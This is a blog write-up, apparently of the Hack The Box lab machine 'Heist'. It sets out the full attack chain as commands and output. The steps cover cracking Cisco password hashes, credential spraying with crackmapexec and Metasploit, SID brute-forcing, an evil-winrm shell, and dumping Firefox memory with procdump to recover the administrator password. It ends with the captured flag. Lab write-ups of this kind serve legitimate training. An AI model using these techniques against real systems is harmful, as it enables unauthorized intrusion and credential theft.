Home Hack The Box - Heist
Post
Cancel

Hack The Box - Heist

Heist was an easy box that involved some password cracking and dumping Firefox’s processes.At first, we found a Cisco configuration file on the website that contained usernames and password hashes. After recovering passwords, we found one that worked to get RPC access, through which we found more usernames. We then got a Winrm session from one of these usernames and passwords. We observed that Firefox was running and dumped its process memory to uncover the password for the website, which also happened to be the administrator password for the system.

RECON

NMAP

Starting with nmap it shows few ports open.

  • Port 80: Microsoft IIS httpd 10.0
  • Port 135: Microsoft Windows RPC
  • Port 445: SMB
  • Port 5985: WinRM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$sudo nmap -sC -sV -p- --min-rate 10000 -oN Heist-all-tcp.nmap 10.10.10.149 
[sudo] password for niraz: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 07:32 +0545 
Nmap scan report for 10.10.10.149 
Host is up (0.079s latency). 
Not shown: 65530 filtered tcp ports (no-response) 
PORT      STATE SERVICE       VERSION 
80/tcp    open  http          Microsoft IIS httpd 10.0 
| http-methods: 
|_  Potentially risky methods: TRACE 
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set 
| http-title: Support Login Page 
|_Requested resource was login.php 
|_http-server-header: Microsoft-IIS/10.0 
135/tcp   open  msrpc         Microsoft Windows RPC 
445/tcp   open  microsoft-ds? 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found 
|_http-server-header: Microsoft-HTTPAPI/2.0 
49669/tcp open  msrpc         Microsoft Windows RPC 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 
Host script results: 
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required 
| smb2-time: 
|   date: 2023-01-09T01:49:00 
|_  start_date: N/A 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 109.73 seconds

WEB - ENUMERATION

It presents a login form.

tried some basic email and password, it did not work.

LOGIN AS GUEST

After login as guest, we can see it’s some kind of support portal and hazard has uploaded cisco router configuration file as an attachment.We can view the configuration file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
version 12.2 
no service pad 
service password-encryption 
! 
isdn switch-type basic-5ess 
! 
hostname ios-1 
! 
security passwords min-length 12 
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 
! 
username rout3r password 7 0242114B0E143F015F5D1E161713 
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 
! 
! 
ip ssh authentication-retries 5 
ip ssh version 2 
! 
! 
router bgp 100 
 synchronization 
 bgp log-neighbor-changes 
 bgp dampening 
 network 192.168.0.0Â mask 300.255.255.0 
 timers bgp 3 9 
 redistribute connected 
! 
ip classless 
ip route 0.0.0.0 0.0.0.0 192.168.0.1 
! 
! 
access-list 101 permit ip any any 
dialer-list 1 protocol ip list 101 
! 
no ip http server 
no ip http secure-server 
! 
line vty 0 4 
 session-timeout 600 
 authorization exec SSH 
 transport input ssh

From the above configuration file we can see there are three password hashes.

HashHash Type
$1$pdQG$o8nrSzsGXeaduXrjlvKc91Cisco Type 5 salted md5
0242114B0E143F015F5D1E161713Cisco Type 7
02375012182C1A1D751618034F36415408Cisco Type 7

TYPE 7 DECRYPT

Type 7 password can be decrypted using any online tools. Using this tool to decrypt type 7 password.

1
2
0242114B0E143F015F5D1E161713: $uperP@ssword
02375012182C1A1D751618034F36415408:  Q4)sJu\Y8qz*A3?d

TYPE 5 DECRYPT

Using hashcat to decrypt this hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$hashcat -m 500 hash /usr/share/wordlists/rockyou.txt

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent  
Session..........: hashcat  
Status...........: Cracked  
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)  
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91  
Time.Started.....: Mon Jan  9 08:11:22 2023 (8 mins, 46 secs)  
Time.Estimated...: Mon Jan  9 08:20:08 2023 (0 secs)  
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)  
Guess.Queue......: 1/1 (100.00%)  
Speed.#1.........:     6644 H/s (20.35ms) @ Accel:256 Loops:250 Thr:1 Vec:16  
Recovered........: 1/1 (100.00%) Digests  
Progress.........: 3543552/14344385 (24.70%)  
Rejected.........: 0/3543552 (0.00%)  
Restore.Point....: 3543040/14344385 (24.70%)  
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000  
Candidates.#1....: steauara -> steakdi

now we have few usernames and passwords

1
2
3
4
5
6
7
8
9
$cat usernames.txt 
admin 
rout3r 
Hazard 

$cat passwords.txt 
Q4)sJu\Y8qz*A3?d 
@sswordf 
stealth1agent

SMB - TCP 445

without creds

1
2
$smbmap -H 10.10.10.149 
[!] Authentication error on 10.10.10.149

smbmap gives authentication error, it means to need valid creds to view the shares.

CRACKMAPEXEC

Using crackmapexec we can give a list of username and password. We’ll use creds we have gather till now.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$cme smb -u username.txt -p password.txt --shares 10.10.10.149 
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB       10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [+] Enumerated shares 
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark 
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------ 
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin 
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share 
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

and we found the valid creds Hazard:stealth1agent . we can now re run smbmap with this creds.

1
2
3
4
5
6
7
$smbmap -u hazard -p stealth1agent -H 10.10.10.149 
[+] IP: 10.10.10.149:445        Name: 10.10.10.149 
        Disk                                                    Permissions     Comment 
        ----                                                    -----------     ------- 
        ADMIN$                                                  NO ACCESS       Remote Admin 
        C$                                                      NO ACCESS       Default share 
        IPC$                                                    READ ONLY       Remote IPC

RPCCLIENT

1
$rpcclient -U 'hazard%stealth1agent' 10.10.10.149

we can get SID of user we know using lookupnames.

1
2
3
$rpcclient -U 'hazard%stealth1agent' 10.10.10.149 
$rpcclient $> lookupnames hazard 
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

we can also get user accounts using the SID.

1
2
$rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

Using rpcclient with -c command to directly interact with the command line so that we can bruteforce SIDS.

1
2
3
4
5
6
7
8
$rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c 'lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008' 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

$for i in {1000..1050};do rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown;done 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1) 
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1) 
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1) 
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)

impacket-lookupsid can be used to bruteforce SIDs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$impacket-lookupsid hazard:[email protected] 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation 
[*] Brute forcing SIDs at 10.10.10.149 
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 
500: SUPPORTDESK\Administrator (SidTypeUser) 
501: SUPPORTDESK\Guest (SidTypeUser) 
503: SUPPORTDESK\DefaultAccount (SidTypeUser) 
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 
513: SUPPORTDESK\None (SidTypeGroup) 
1008: SUPPORTDESK\Hazard (SidTypeUser) 
1009: SUPPORTDESK\support (SidTypeUser) 
1012: SUPPORTDESK\Chase (SidTypeUser) 
1013: SUPPORTDESK\Jason (SidTypeUser)

we have now got few more users. updating our usernames file.

1
2
3
4
5
6
7
8
9
$cat usernames.txt 
admin 
rout3r 
Hazard 
Administrator 
Guest 
support 
chase 
Jason

SHELL AS CHASE

METASPLOIT

Using metasploit to find valid creds for winrm.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[msf](Jobs:0 Agents:0) auxiliary(scanner/winrm/winrm_login) >> show options 
Module options (auxiliary/scanner/winrm/winrm_login): 
   Name              Current Setting  Required  Description 
   ----              ---------------  --------  ----------- 
   BLANK_PASSWORDS   false            no        Try blank passwords for all users 
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5 
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database 
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list 
   DB_ALL_USERS      false            no        Add all users in the current database to the list 
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm) 
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification 
   PASSWORD                           no        A specific password to authenticate with 
   PASS_FILE         passwords.txt    no        File containing passwords, one per line 
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...] 
   RHOSTS            10.10.10.149     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit 
   RPORT             5985             yes       The target port (TCP) 
   SSL               false            no        Negotiate SSL/TLS for outgoing connections 
   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host 
   THREADS           1                yes       The number of concurrent threads (max one per host) 
   URI               /wsman           yes       The URI of the WinRM service 
   USERNAME                           no        A specific username to authenticate as 
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line 
   USER_AS_PASS      false            no        Try the username as the password for all users 
   USER_FILE         usernames.txt    no        File containing usernames, one per line 
   VERBOSE           true             yes       Whether to print output for all attempts 
   VHOST                              no        HTTP server virtual host 
[msf](Jobs:0 Agents:0) auxiliary(scanner/winrm/winrm_login) >> run 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: ) 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:@sswordf (Incorrect: ) 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: ) 
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d

we can see that chase can winrm. Using evil-winrm to get the shell.

1
2
3
4
5
6
$evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d" 
Evil-WinRM shell v3.4 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\Chase\Documents>

SHELL AS ADMINISTRATOR

There’s a todo list in the chase desktop that says to keep checking the issues list, which can be done using a browser, browsing the support portal we found earlier.

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt 
Stuff to-do: 
1. Keep checking the issues list. 
2. Fix the router config. 
Done: 
1. Restricted access for guest user.

running ps command we can see a bunch of firefox process.

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\Chase\Desktop> ps 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName 
-------  ------    -----      -----     ------     --  -- ----------- 
    347      19    10232     287536       0.17    740   1 firefox 
    401      34    39024      96248       2.30   2944   1 firefox
   1065      71   149328     227156       8.34   3916   1 firefox
    378      28    23692      60496       1.33   5876   1 firefox
    356      25    16528      39016       0.17   6408   1 firefox

GET CREDS FROM FIREFOX

Using procdump from sysinternals tool to run against one of the process of firefox.

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\Chase\Documents> upload procdump64.exe
Info: Uploading procdump64.exe to C:\Users\Chase\Documents\procdump64.exe


Data: 566472 bytes of 566472 bytes copied

Info: Upload successful!
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64 -ma 740 -accepteula

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[20:49:10] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_230129_204910.dmp
[20:49:10] Dump 1 writing: Estimated dump file size is 288 MB.
[20:49:10] Dump 1 complete: 288 MB written in 0.4 seconds
[20:49:10] Dump count reached.

Downloading the dump.

1
*Evil-WinRM* PS C:\Users\Chase\Documents> download firefox.exe_230129_204910.dmp

Strings can be used to grep password from the dump file, and we got login usernamd and password from it.

1
2
3
4
5
6
7
8
$strings firefox.exe_230129_134546.dmp | grep password=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"

and we got shell as administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
$evil-winrm -i 10.10.10.149 -u administrator  -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
supportdesk\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
caf30de94a7ba38168831b756dee6dea

This post is licensed under CC BY 4.0 by the author.

Hack The Box - Timelapse

eLearnSecurity - eJPTv2

Comments powered by Disqus.